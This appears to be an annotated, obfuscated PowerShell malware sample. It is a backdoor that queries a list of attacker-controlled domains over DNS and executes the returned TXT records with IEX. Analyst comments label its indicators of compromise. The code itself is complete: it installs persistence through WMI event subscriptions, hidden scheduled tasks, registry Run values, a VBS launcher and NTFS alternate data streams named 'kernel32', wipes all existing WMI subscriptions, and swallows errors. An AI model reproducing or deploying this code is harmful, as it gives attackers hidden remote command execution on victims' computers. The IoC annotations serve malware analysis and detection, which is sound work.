- ${script:___/=\___/\__/=\_} = @($('algew.me')),$('aloqd.pw')),$('dyiud.com')),$('bpee.pw')),$('daskd.me')),$('dlex.pw')),$('doof.pw')),$('cnmah.pw')),$('dtxf.pw')),$('gjcu.pw')),$('gjuc.pw')),$('ihrs.pw')),$('kjke.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjet.pw')),$('mjut.pw')),$('mvze.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpua.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yamd.pw')),$('yedq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
- ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- # Remembers the last executed command text so the same record is not run twice.
- ${__/\_/\/=\/=\/=\/} = ""
- while($true)
- {
- ${_/\/\/\__/=\_/\/=} = 0;
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS | Out-String
- }
- else
- {
- ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" | Out-String
- }
- ${/==\/===\/==\___/}=${/==\/===\/==\___/}.Trim()
- # 'idle' -> long sleep (3500-5400 s, roughly 1-1.5 h) before polling again.
- if(${/==\/===\/==\___/} -eq $('idle')))
- {
- start-sleep -seconds $(Get-Random -Minimum 3500 -Maximum 5400)
- continue
- }
- if (${/==\/===\/==\___/} -eq $cmdstring)
- {
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS
- }
- else
- {
- ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}"
- }
- ${___/=======\_/\__} = ${/==\__/\_/\_/=\_/} | Out-String
- # Command execution: the TXT record body is run with IEX if non-empty and new.
- if(${___/=======\_/\__} -ne "" -And ${__/\_/\/=\/=\/=\/} -ne ${___/=======\_/\__})
- {
- ${__/=\/\_/\__/===\} = IEX ${___/=======\_/\__}
- ${__/\_/\/=\/=\/=\/} = ${___/=======\_/\__}
- }
- ${__/=\/\_/\__/===\}
- ${_/\/\/\__/=\_/\/=}++
- # Short sleep (50-70 s) while in command mode.
- sleep -Seconds $(Get-Random -Minimum 50 -Maximum 70)
- }
- if(${/==\/===\/==\___/} -eq $StopString)
- {
- break;
- }
- }
- }
- # All errors are swallowed; the process always exits from finally.
- Catch
- {
- }
- finally
- {
- exit;
- }
- }
- ')))
- # IoC: storage locations. The implant text is written to an NTFS alternate data stream
- # named "kernel32.dll" on the file %ProgramData%\Windows, and a VBS launcher to the
- # stream "kernel32.vbs" on the same file (the ':' in the path below selects the stream).
- ${/==\_/========\/=} = $env:programdata+$('\Windows'))
- ${___/===\/==\_/\/\} = $('kernel32.dll'))
- ${/==\/=\_/\/\/\/==} = $('kernel32.vbs'))
- ${_/\_/==\___/==\__} = "${/==\_/========\/=}`:${/==\/=\_/\/\/\/==}"
- # Persist branch (switch 1 set).
- if(${_/===\/\/=\/\___/=} -eq $True)
- { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
- # Registry targets depend on whether the current token is in the local Administrators role.
- ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${_/\___/\_/=\/\_/=} = $('HKLM:Software\Microsoft\Windows\CurrentVersion'))
- ${_/\__/=\_/\/==\__} = $('HKLM:Software\Microsoft\Windows\CurrentVersion\Run\'))
- }
- else
- { ${_/\___/\_/=\/\_/=} = $('HKCU:Software\Microsoft\Windows'))
- ${_/\__/=\_/\/==\__} = $('HKCU:Software\Microsoft\Windows\CurrentVersion\Run\'))
- }
- # PowerShell major version decides the storage path: v3+ supports -Stream on Set/Add-Content.
- ${_/=\_/\_/=\_/=\__} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
- if(${_/=\_/\_/=\_/=\__} -gt 2)
- # sc/ac = Set-Content/Add-Content: stage text, then the `logic ...` call line, into the ADS.
- { sc -Path ${/==\_/========\/=} -Value ${/=\/=\/==\/=\_/==} -Stream ${___/===\/==\_/\/\}
- ac -Path ${/==\_/========\/=} -Value ${_/\/\_/\/\_/===\_} -Stream ${___/===\/==\_/\/\}
- }
- else
- # PowerShell 2 fallback: gzip+Base64 of stage + call line stored in registry value "kernel32".
- { ${__/==\/\_____/\/\} = ${/=\/=\/==\/=\_/==} + "`n" + ${_/\/\_/\/\_/===\_}
- ${/=\/=\____/\_/\__} = ____/=\/==\/\/\_/=(${__/==\/\_____/\/\})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name kernel32 -PropertyType String -Value ${/=\/=\____/\_/\__} -force
- }
- ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- # Administrator path: permanent WMI event subscription plus a scheduled task.
- if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${/==\/=\_/===\/=\/}=$('kernel32_Filter'));
- ${_/====\_/=\_/\_/\}=$('kernel32_consumer'));
- # Deletes EVERY existing __EventFilter, CommandLineEventConsumer and binding in
- # root\subscription (no name filter) - collateral removal of legitimate subscriptions
- # is itself a forensic cue.
- gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
- gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
- gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
- # IoC: __EventFilter "kernel32_Filter" firing on Win32_LogonSession creation (i.e. at logon), polled every 30 s.
- ${_/==\_/=\___/\_/=} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __EventFilter -Arguments @{Name = ${/==\/=\_/===\/=\/}; EventNamespace = $('root\CIMV2')); QueryLanguage = $('WQL')); Query = $('Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession''))}
- ${/=\/\/\_/\/=\/==\} = ""
- if(${_/=\_/\_/=\_/=\__} -gt 2)
- # IoC: CommandLineEventConsumer "kernel32_consumer" running hidden powershell that IEXs the ADS content.
- { ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)`""}
- ${/=\/\/\_/\/=\/==\} = "IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|out-string)"
- ${__/\__/=\__/=\/=\} = "IEX `$(gc -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\} ^|Out-String)`""
- ${_/\/\/\_/\/=\/=\_} = [System.Text.Encoding]::Unicode.GetBytes(${__/\__/=\__/=\/=\})
- ${/==\______/===\__} = [Convert]::ToBase64String(${_/\/\/\_/\/=\/=\_})
- # IoC: scheduled task "kernel32", trigger onidle after 30 min, running powershell -e <base64>.
- schtasks.exe /F /create /tn kernel32 /tr "powershell.exe -WindowStyle Hidden -e ${/==\______/===\__}" /sc onidle /i 30
- }
- else
- # PowerShell 2 variant: a decoder one-liner is stored in registry value "Part" and IEX'd from there.
- { ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
- ${/=\/\/\_/\/=\/==\} = "IEX `$((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
- ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`""}
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`"" /sc onidle /i 30
- }
- # Binds filter to consumer - the point at which the WMI persistence becomes active.
- Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/==\_/=\___/\_/=}; Consumer = ${___/=\__/\/\/=\_/}} | out-null
- # Run-now (switch 2): execute the launcher string in this session as well.
- if(${_/==\/\__/==\__/\/}){ IEX ${/=\/\/\_/\/=\/==\};
- }
- }
- # Non-administrator path: VBS launcher in an ADS, HKCU Run value and a scheduled task.
- else
- { if(${_/=\_/\_/=\_/=\__} -gt 2)
- { ${/=\/\/\_/\/=\/==\} = "IEX (Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)"
- # Two cmd /c echo calls write a WScript.Shell .run() stub (hidden window) into the "kernel32.vbs" stream.
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
- # IoC: HKCU\...\Run value "kernel32" = "wscript <ADS path>", plus scheduled task "kernel32" (onidle, 30 min).
- New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
- }
- else
- # PowerShell 2 variant of the non-admin path: decoder one-liner in registry value "Part".
- { ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
- New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
- ${/=\/\/\_/\/=\/==\} = "IEX ((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
- New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
- schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
- }
- # Run-now (switch 2): start the VBS launcher immediately.
- if(${_/==\/\__/==\__/\/}){IEX "wscript ${_/\_/==\___/==\__}";}
- }
- }
- # No-persist branch (switch 1 clear): stage and `logic` call are IEX'd in memory only.
- else
- { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
- IEX "${/=\/=\/==\/=\_/==} `n ${_/\/\_/\/\_/===\_}"
- }}
- # Invocations: both set the persist and run-now switches. First call: startdomain 'www',
- # cmdstring 'www', commanddomain 'mail', stopstring 'stop'. Second call (IoC: whily.pw):
- # startdomain 'ns4.whily.pw', cmdstring "vv", commanddomain 'e.whily.pw'.
- # Since `logic` ends in `exit`, whether the second call is ever reached depends on the first.
- _/===\_/\_/====\/\ $('www')) $('www')) $('mail')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
- _/===\_/\_/====\/\ $('ns4.whily.pw')) "vv" $('e.whily.pw')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
- # Tail of the outer wrapper from lStr: gunzip the blob and IEX the resulting script.
- ');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"